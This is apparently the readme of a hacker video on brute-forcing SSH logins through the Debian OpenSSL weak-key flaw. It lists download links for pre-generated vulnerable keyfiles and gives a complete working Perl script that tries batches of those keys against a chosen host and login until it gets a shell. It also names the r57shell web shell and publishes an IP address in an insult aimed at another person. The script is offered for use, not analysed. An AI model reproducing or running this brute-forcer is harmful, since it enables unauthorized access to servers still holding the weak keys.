---------------------------------------------------------
--- Debian OpenSSL Bruteforce
--- author: F0rtress Zer0 (mail - last frame)
---------------------------------------------------------
music: Trent Reznor - Damnation (from quake)

Pre-generated keyfiles:
http://sugar.metasploit.com/debian_ssh_dsa_1024_x86.tar.bz2
http://sugar.metasploit.com/debian_ssh_rsa_2048_x86.tar.bz2 <- THIS USED
http://milw0rm.com/sploits/debian_ssh_rsa_2048_x86.tar.bz2  <- MIRROR
http://sugar.metasploit.com/debian_ssh_rsa_1023_x86.tar.bz2
http://sugar.metasploit.com/debian_ssh_rsa_1024_x86.tar.bz2
http://sugar.metasploit.com/debian_ssh_rsa_2047_x86.tar.bz2
http://sugar.metasploit.com/debian_ssh_rsa_4096_x86.tar.bz2
http://sugar.metasploit.com/debian_ssh_rsa_8192_1_4100_x86.tar.bz2

Brutforcer script code:
--- BEGIN ---
#!/usr/bin/perl
use strict;
use warnings;

## SSH keyfile bruteforce script
## Coded by Fortress Zero ([email protected])

my $keysPerConnect = 6;

my $usage = "\nUsage: ./script.pl <pathToKeys> <host> <login>\n";

my $path = shift or die($usage."Path to keys is not specified\n");
my $host = shift or die($usage."Host is not specified\n");
my $login = shift or die($usage."Login is not specified\n");

die or chdir($path);
opendir(A, $path) or die("\nerr: could not open dir\n");
print "\nCounting all keys...\n";
my @kez;
while ($_ = readdir(A)) {
chomp;
# filter only private keys
next unless m,^\w+-\d+$,;
push(@kez, $_);
}
my $full = $#kez+1;
print "TOTAL ".$full." number of keys\n";
print "BRUTEFORCE attack start\n";
my $cmdsCount = int($full/$keysPerConnect);
my $pre_cmd = "ssh -o \"BatchMode yes\" -l ".$login;
my $post_cmd = ' '.$host.' "id;exit"';
my $clock_start = time();
my $time_elapsed = 0;
my $time_left = 0;
for(my $i = 1; $i <= $cmdsCount; $i++){
$time_elapsed = time()-$clock_start;
$time_left = int($time_elapsed/$i*($cmdsCount-$i));
printf "%06d/%06d - %02d:%02d:%02d/%02d:%02d:%02d\n",
       $i,
       $cmdsCount,
       (gmtime($time_elapsed))[2],
       (gmtime($time_elapsed))[1],
       (gmtime($time_elapsed))[0],
       (gmtime($time_left))[2],
       (gmtime($time_left))[1],
       (gmtime($time_left))[0];
my $mid_cmd = '';
for(my $j = 0; $j < $keysPerConnect; $j++){
 my $cur = shift(@kez);
 $mid_cmd.= " -i ".$cur;
}
my $ret = system($pre_cmd.$mid_cmd.$post_cmd);
if($ret!=65280){
 ## seems that we've got shell
 my @valid = split ' -i ',$mid_cmd;
 shift @valid;
 print "Valid pack of keys found\n";
 print "Trying to determine correct key...\n";
 foreach (@valid) {
  print $_."\n";
  my $ret2 = system($pre_cmd.' -i '.$_.$post_cmd);
  if($ret2!=65280){
   print "PRIVATE KEY FOUND\nTHIS IS IT -> ".$_." <-\n";
   die("SUCCESS!!!!\n");
  }
 }
 print "Looks like false alarm...\n";
}
}
print "Small amount of keys remaining,\nTrying one-by-one\n";
foreach (@kez) {
print $_."\n";
my $ret3 = system($pre_cmd.' -i '.$_.$post_cmd);
if($ret3!=65280){
 print "You fucking lucky!\n";
 print "PRIVATE KEY FOUND\nTHIS IS IT -> ".$_." <-\n";
 die("SUCCESS!!!!\n");
}
}
print "SHIT! BRUTEFORCE FAILED!\n";
exit;
--- END ---

Software seen in video:
- Windows XP SP2
- OperaUSB 9.51
- r57shell 1.4
- portaputty
- Ubuntu 7.10

Software used for creation:
- MS Virtual PC 2007
- VMWare Player
- Ubuntu 7.10 (2 times)
- BB Flashback recorder 1.5.6
- Macromedia Flash MX 2004
- Nero WaveEditor 3.9.1.0
- Audacity 1.2.6
- DivX Codec
- LAME MP3 encoder/decoder

---
Hack the planet!
Keep private!
Cheat script-kiddies!
---
Hello gobzer!
Hello Molot!
Hello AFX!
Hello flufx!
Hello kostapc!
hello unknown from cc06 (nokia, your DVD) - contact me!
---
Fuck you Trash !!!(245659,982399,tgbr,92.245.59.233)
Antichat abused my video! I HATE YOU!
---
I know kung-foo
You can now hire me for something legal - contact thru email

You are viewing proxied material from ftp.icm.edu.pl. The copyright of proxied material belongs to its original authors. Any comments or complaints in relation to proxied material should be directed to the original authors of the content concerned. Please see the disclaimer for more details.